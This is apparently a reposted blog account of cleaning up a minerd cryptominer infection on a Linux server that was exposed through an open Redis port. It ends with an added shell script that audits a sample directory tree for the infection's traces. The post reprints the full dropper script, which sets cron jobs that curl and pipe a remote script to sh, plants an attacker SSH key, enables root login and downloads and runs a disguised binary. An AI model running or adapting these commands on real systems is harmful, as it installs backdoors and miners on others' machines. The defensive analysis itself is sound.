Complete cleanup process after a minerd infection on Linux (detailed)

Source: Internet
Author: User
Tags: chmod, curl, mkdir, redis, ssh

I had carelessly installed a Redis service and opened its default port to the whole network, thinking at first that it would not matter because this server has no public IP. It turned out to be too late for regrets.

One day I noticed that the CPU load was unusually high: a minerd process was taking a large share of the CPU. A Google search showed that I had been hit.

Here is the cleanup process.

First step

1. Stop the Redis service immediately, restrict access to the port, and set a password.


2. Delete the two crontab files, as recommended in information found online

sudo rm /var/spool/cron/root
sudo rm /var/spool/cron/crontabs/root

3. Know your enemy: study the virus's initial script file

pm.sh, the script that the cron entry fetches and pipes into sh:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/khk75neoiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk75neoiq
    echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
    echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
    echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
    echo "AuthorizedKeysFile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
    if [ ! -f "/etc/systemd/system/ntp.service" ]; then
        mkdir -p /opt
        curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/khk75neoiq33 && chmod +x /opt/khk75neoiq33 && /opt/khk75neoiq33 -install
    fi
fi
/etc/init.d/ntp start
ps auxf | grep -v grep | grep "/usr/bin/cron" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "/opt/cron" | awk '{print $2}' | xargs kill -9

What the script tells us

1. Delete the crontab configuration files (already done above). The code involved:

echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root

2. Delete the key file that is used for password-less login

rm -f ~/.ssh/authorized_keys*
rm -f ~/.ssh/khk75neoiq

You can even remove the .ssh directory entirely.
The code involved:

if [ ! -f "/root/.ssh/khk75neoiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk75neoiq
    echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
    echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
    echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
    echo "AuthorizedKeysFile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi

3. Delete the /opt/ directory; what is in it is generated by the service set up in step 4.

4. Delete the service

service ntp stop
rm /etc/init.d/ntp
rm /usr/sbin/ntp

The code involved:

if [ ! -f "/etc/init.d/ntp" ]; then
    if [ ! -f "/etc/systemd/system/ntp.service" ]; then
        mkdir -p /opt
        curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/khk75neoiq33 && chmod +x /opt/khk75neoiq33 && /opt/khk75neoiq33 -install
    fi
fi

As the code shows, it downloads an 8 MB program and installs it. What it installs, the original poster did not know, but the next line gives its whereabouts away:

/etc/init.d/ntp start

This line starts the ntp service. A Baidu search says ntp is a time service, but in fact this one is the virus's service: opening the init script shows that it runs the executable /usr/sbin/ntp, and that file is byte-for-byte identical to the 8 MB download.

So delete that file too.

Finally

ps aux | grep minerd

Kill all the processes it lists, and the fix is done.

Half an hour later:

ps aux | grep minerd

The minerd process no longer appears.
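As an added example (not part of the original post), the POSIX shell script below audits a host for the specific artefacts described above: the cron curl-pipe-sh entries, the sshd_config lines the dropper appends, the /usr/sbin/ntp binary being byte-identical to the downloaded payload, and a running minerd process. It runs against a constructed sample directory tree so it can be tried offline; the file names and paths are the ones the post quotes.

```shell
# Added example, not from the original post: audit a host for the persistence
# artefacts the pm.sh dropper leaves behind. Each check takes a root prefix so it
# can run against a constructed tree; on a real host pass "/". Only the indicators
# the post quotes are used (cron curl|sh line, khk75neoiq key, fake ntp service).

# Print the cron files that pipe a downloaded script into sh.
find_cron_droppers() {
    grep -lsE 'curl[^|]*[|][[:space:]]*sh' \
        "$1/var/spool/cron/root" "$1/var/spool/cron/crontabs/root"
}

# Print the sshd_config lines the dropper appends (case-insensitive: the page's copy is lowercased).
find_sshd_tampering() {
    grep -isE '^(authorizedkeysfile[[:space:]]+\.ssh/khk75neoiq|permitrootlogin[[:space:]]+yes)' \
        "$1/etc/ssh/sshd_config"
}

# Succeed when the "ntp" binary started by the init script is byte-identical to
# the downloaded payload, which is how the post identified the service as malicious.
payload_matches_service() {
    cmp -s "$1/usr/sbin/ntp" "$1/opt/khk75neoiq33"
}

# Succeed when a minerd process is running (the post's final check).
miner_running() {
    ps aux 2>/dev/null | grep -q '[m]inerd'
}

# Constructed sample tree that mimics the compromised host; prints its path.
make_sample_tree() {
    r=$(mktemp -d)
    mkdir -p "$r/var/spool/cron/crontabs" "$r/etc/ssh" "$r/usr/sbin" "$r/opt"
    for f in root crontabs/root; do
        echo '*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh' > "$r/var/spool/cron/$f"
    done
    printf 'Port 22\nPermitRootLogin yes\nAuthorizedKeysFile .ssh/khk75neoiq\n' > "$r/etc/ssh/sshd_config"
    printf 'FAKE-PAYLOAD' > "$r/opt/khk75neoiq33"   # stands in for the 8 MB binary
    cp "$r/opt/khk75neoiq33" "$r/usr/sbin/ntp"
    echo "$r"
}

# Run the audit against the sample tree and print what it finds.
demo() {
    r=$(make_sample_tree)
    find_cron_droppers "$r"
    find_sshd_tampering "$r"
    payload_matches_service "$r" && echo "/usr/sbin/ntp is the downloaded payload"
    miner_running && echo "minerd still running" || echo "no minerd process"
    rm -rf "$r"
}
```

Call `demo` to see the report for the sample tree; on a live host, run the individual checks with `/` as the prefix.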

